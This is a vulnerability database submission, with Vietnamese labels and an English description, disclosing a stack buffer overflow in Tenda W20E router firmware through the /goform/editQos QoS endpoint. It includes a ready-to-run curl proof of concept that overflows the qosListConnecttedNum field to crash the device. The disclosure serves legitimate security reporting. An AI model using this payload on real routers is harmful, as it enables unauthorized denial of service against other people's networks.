| tiêu đề | Tenda W20E US_W20EV4.0br_V15.11.0.6(1068_1546_841)_CN_TDC.bin Buffer Overflow |
|---|
| Mô tả | Tenda W20E firmware V4.0br_V15.11.0.6(1068_1546_841)_CN_TDC contains a stack-based buffer overflow in the QoS edit code path reachable via POST /goform/editQos. In lstAdd, the attacker-controlled qosListConnecttedNum value is retrieved through websGetVar and written with sprintf into the fixed-size ruleConnectLimit[128] stack buffer without length validation. Because the server-side code does not enforce the client-side length restriction, an authenticated attacker can supply an oversized qosListConnecttedNum value to corrupt stack memory and cause a denial of service. Exploitation of this branch is state-dependent and requires valid QoS-related group objects to be present.
Proof-of-concept
curl -i 'http://192.168.0.1/goform/editQos' -b cookies.txt \
--data-urlencode "qosListIndex=0" \
--data-urlencode "qosListConnecttedNum=$(python3 -c 'print(\"A\"*200)')" \
--data-urlencode "qosListEn=1" \
--data-urlencode "qosListIPGroupRemark=G1" \
--data-urlencode "qosListUpstream=64" \
--data-urlencode "qosListDownstream=128" \
--data-urlencode "qosListMode=share" \
--data-urlencode "qosListTimeGroupRemark=T1" |
|---|
| Nguồn | ⚠️ https://github.com/paueger/mycve/blob/main/Tenda_W20E/3.md |
|---|
| Người dùng | paxiot (UID 94927) |
|---|
| Đệ trình | 25/06/2026 11:26 (cách đây 2 các tháng) |
|---|
| Kiểm duyệt | 14/08/2026 07:30 (2 months later) |
|---|
| Trạng thái | được chấp nhận |
|---|
| Mục VulDB | 389955 [Tenda W20E 15.11.0.6(1068_1546_841)_CN_TDC QoS Edit /goform/editQos lstAdd qosListConnecttedNum tràn bộ đệm] |
|---|
| điểm | 20 |
|---|